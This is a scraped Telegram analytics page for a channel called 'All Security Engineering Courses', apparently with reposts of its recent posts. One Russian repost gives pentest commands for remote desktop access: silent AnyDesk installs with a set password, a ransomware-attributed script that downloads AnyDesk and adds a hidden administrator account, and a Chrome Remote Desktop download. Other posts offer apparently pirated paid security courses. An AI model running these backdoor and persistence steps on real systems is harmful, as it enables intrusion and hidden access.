uz
Feedback
All Security Engineering Courses

All Security Engineering Courses

Kanalga Telegram’da o‘tish

This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!

Ko'proq ko'rsatish

📈 Telegram kanali All Security Engineering Courses analitikasi

All Security Engineering Courses (@allsecurityengineeringcourses) Ingliz til segmentidagi kanali faol ishtirokchi. Hozirda hamjamiyat 18 788 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 7 164-o'rinni va Rossiya mintaqasida 35 979-o'rinni egallagan.

📊 Auditoriya ko‘rsatkichlari va dinamika

невідомо sanasidan buyon loyiha tez o‘sib, 18 788 obunachiga ega bo‘ldi.

13 Iyun, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 123 ga, so‘nggi 24 soatda esa 4 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.

  • Tasdiqlash holati: Tasdiqlanmagan
  • Jalb etish (ER): Auditoriya o‘rtacha 10.31% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining 3.09% ini tashkil etuvchi reaksiyalarni to‘playdi.
  • Post qamrovi: Har bir post o‘rtacha 1 937 marta ko‘riladi; birinchi sutkada odatda 580 ta ko‘rish yig‘iladi.
  • Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 2 ta reaksiya keladi.
  • Tematik yo‘nalishlar: Kontent git, strace, github, linux, docker kabi asosiy mavzularga jamlangan.

📝 Tavsif va kontent siyosati

Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...

Yuqori yangilanish chastotasi (oxirgi ma’lumot 14 Iyun, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.

18 788
Obunachilar
+424 soatlar
+287 kunlar
+12330 kunlar
Postlar arxiv
Repost from RedTeam brazzers
Всем привет! В чате иногда возникает вопрос: «А как обеспечить себя графическим интерфейсом в ходе пентестов?» И иногда дейст
Всем привет! В чате иногда возникает вопрос: «А как обеспечить себя графическим интерфейсом в ходе пентестов?» И иногда действительно хочется посмотреть на чужой монитор своими глазами, отойдя от замыленных зеленых консолек. В посте собрал список инструментов для решения такой задачи :) Самый простой способ — включай RDP.
nxc smb 10.10.10.10 -u admin -p admin -M rdp -o ACTION=enable METHOD=smb

nxc wmi 10.10.10.10 -u admin -p admin -M rdp -o ACTION=enable METHOD=wmi

# опционально добавляем себя в Remote Desktop Users
Однако для совершения этой операции потребуются права админа, а они есть далеко не всегда, поэтому мы можем посмотреть в сторону VNC, например, POC vncdll. Впрочем, иногда смотрят в сторону AnyDesk. Для развертывания есть скрипт-ванлайнер:
# deploy.cmd
C:\Users\victim\AppData\Local\Temp\anydesk.exe --install C:\Users\victim\AppData\Local\AnyDesk --start-with-win --silent
del C:\Users\victim\AppData\Local\Temp\anydesk.exe
echo Passw0rd! | C:\Users\victim\AppData\Local\AnyDesk\AnyDesk.exe --set-password
for /f "delims=" %i in ('C:\Users\victim\AppData\Local\AnyDesk\AnyDesk.exe --get-id') do echo %i

# Запускаем скрипт
cme smb 192.168.0.1 -u victim -p 'Passw0rd!' -x deploy.cmd
Этим способом любит пользоваться Conti, они разворачивают вот так:
Function AnyDesk {

   mkdir "C:\ProgramData\AnyDesk"
   # Download AnyDesk
   $clnt = new-object System.Net.WebClient
   $url = "http://download.anydesk.com/AnyDesk.exe"
   $file = "C:\ProgramData\AnyDesk.exe"
   $clnt.DownloadFile($url,$file)


   cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent


   cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password


   net user oldadministrator "qc69t4B#Z0kE3" /add
   net localgroup Administrators oldadministrator /ADD
   reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f

   cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id

   }

  AnyDesk
А их коллеги — LockBit — разворачивают Google Chrome Remote Desktop:
# Download from Google
powershell  -c (New-Object System.Net.WebClient).DownloadFile('https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi', $env:ProgramData+'\\1.msi')

# Install
msiexec /i C:\\ProgramData\\1.msi
Наконец, в нашем небольшом чатике коллеги накидали иные варианты: - https://rustdesk.com/ ; - https://www.supremocontrol.com/ ; - https://www.n-able.com/products/n-sight-rmm ; - https://github.com/miroslavpejic85/p2p ; - https://github.com/ps1337/reinschauer .

PENTESTING WITH PARROT OS Learn Hacking from Basic to Pro -------------------------------------------------------- Channel Link ➧More Channels | ➧Add Chat | ➧Shop

Repost from Offensive Xwitter
😈 [ Synacktiv @Synacktiv ] Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by @yaumn_ and @wil_fri3d. 🔗 https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025 🐥 [ tweet ]

Windows Privilege Escalation

@WickHelps-EC510 Videos + PDF 2025.4.zip3529.15 MB

@WickHelps-EC510 Videos + PDF 2025.4.z013891.20 MB

#Exclusive 🔥 #First_Time_Ever 🔥 Course SEC510 Cloud Security Controls and Mitigations🔥🆕 👨‍💻 Password : @WickHelps ❤️ Ex
#Exclusive 🔥 #First_Time_Ever 🔥 Course SEC510 Cloud Security Controls and Mitigations🔥🆕 👨‍💻 Password : @WickHelps ❤️ Exam Guide : link ❗️ Backup all channels Link 🔮 Any-Issues: Chat Here

ALL IN ONE AWSOME CYBERSEC RESOURCES By #TheStarkArmy (All open source resources) Awesome Red Team Ops https://github.com/CyberSecurityUP/Awesome-Red-Team-Operations Awesome Red Teaming https://github.com/yeyintminthuhtut/Awesome-Red-Teaming Awesome Red Team ToolKit https://0x1.gitlab.io/pentesting/Red-Teaming-Toolkit/ Awesome Blue Team Ops https://github.com/fabacab/awesome-cybersecurity-blueteam Awesome OSINT https://github.com/jivoi/awesome-osint Awesome DevSecOps https://github.com/devsecops/awesome-devsecop Awesome Pentest https://github.com/enaqx/awesome-pentest Awesome Cloud Pentest https://github.com/CyberSecurityUP/Awesome-Cloud-PenTest Awesome Shodan https://github.com/jakejarvis/awesome-shodan-queries Awesome AWS Security https://github.com/jassics/awesome-aws-security Awesome Malware Analysis & Reverse Engineering https://github.com/CyberSecurityUP/Awesome-Malware-Analysis-Reverse-Engineering Awesome Malware Analysis https://github.com/rshipp/awesome-malware-analysis The Cyber Security https://t.me/+M0_cfkd6HDxkYzI1 Awesome Computer Forensic https://github.com/cugu/awesome-forensics Awesome Cloud Security https://github.com/4ndersonLin/awesome-cloud-security Awesome Reverse Engineering https://github.com/tylerha97/awesome-reversing Awesome Threat Intelligence https://github.com/hslatman/awesome-threat-intelligence Awesome SOC https://github.com/cyb3rxp/awesome-soc Awesome Social Engineering https://github.com/v2-dev/awesome-social-engineering Awesome Web Security https://github.com/qazbnm456/awesome-web-security#prototype-pollution Awesome Forensics https://github.com/cugu/awesome-forensics Awesome API Security https://github.com/arainho/awesome-api-security Awesome WEB3 https://github.com/Anugrahsr/Awesome-web3-Security Awesome Incident Response https://github.com/Correia-jpv/fucking-awesome-incident-response Awesome Search Engines https://github.com/edoardottt/awesome-hacker-search-engines Awesome Smart Contract Security https://github.com/saeidshirazi/Awesome-Smart-Contract-Security The Cyber Security https://t.me/+M0_cfkd6HDxkYzI1 Awesome Terraform https://github.com/shuaibiyy/awesome-terraform Awesome Cloud Pentest https://github.com/CyberSecurityUP/Awesome-Cloud-PenTest Awesome Burpsuite Extensions https://github.com/snoopysecurity/awesome-burp-extensions Awesome IOT https://github.com/phodal/awesome-iot/blob/master/README.md Awesome IOS Security https://github.com/Cy-clon3/awesome-ios-security Awesome Embedded & IOT Security https://github.com/fkie-cad/awesome-embedded-and-iot-security Awesome OSINT Bots https://github.com/ItIsMeCall911/Awesome-Telegram-OSINT#-bots Awesome IOT Hacks https://github.com/nebgnahz/awesome-iot-hacks Awesome WEB3 Security https://github.com/Anugrahsr/Awesome-web3-Security Awesome Security https://github.com/sbilly/awesome-security Awesome Reversing https://github.com/tylerha97/awesome-reversing Awesome Piracy https://github.com/Igglybuff/awesome-piracy Awesome Web Hacking https://github.com/infoslack/awesome-web-hacking Awesome Memory Forensics https://github.com/digitalisx/awesome-memory-forensics Awesome OSCP https://github.com/0x4D31/awesome-oscp Awesome RAT https://github.com/alphaSeclab/awesome-rat Learn Hacking from Basic to Pro -------------------------------------------------------- Channel Link ➧Add Chat | ➧Shop

[ Выпуск 311 ] #2025год #Февраль Журнал Хакер

[ Выпуск 310 ] #2025год #Январь Журнал Хакер

#Exclusive 🔥 #First_Time_Ever 🔥 Academy - Advanced Attacks Against Active Directory🔥🆕 👨‍💻 Password : @WickHelps ❤️ Exam
#Exclusive 🔥 #First_Time_Ever 🔥 Academy - Advanced Attacks Against Active Directory🔥🆕 👨‍💻 Password : @WickHelps ❤️ Exam Guide : link ❗️ Backup all channels Link 🔮 Any-Issues: Chat Here

#Exclusive 🔥 #First_Time_Ever 🔥 Kaspersky - Hunting APTs like a Ninja with YARA🔥🆕 👨‍💻 Password : @WickHelps ❤️ Exam Gui
#Exclusive 🔥 #First_Time_Ever 🔥 Kaspersky - Hunting APTs like a Ninja with YARA🔥🆕 👨‍💻 Password : @WickHelps ❤️ Exam Guide : link ❗️ Backup all channels Link 🔮 Any-Issues: Chat Here

#Exclusive 🔥 #First_Time_Ever 🔥 Active Directory Exploitation and Lateral Movement Black-Box🔥🆕 👨‍💻 Password : @WickHelp
#Exclusive 🔥 #First_Time_Ever 🔥 Active Directory Exploitation and Lateral Movement Black-Box🔥🆕 👨‍💻 Password : @WickHelps ❤️ Exam Guide : link ❗️ Backup all channels Link 🔮 Any-Issues: Chat Here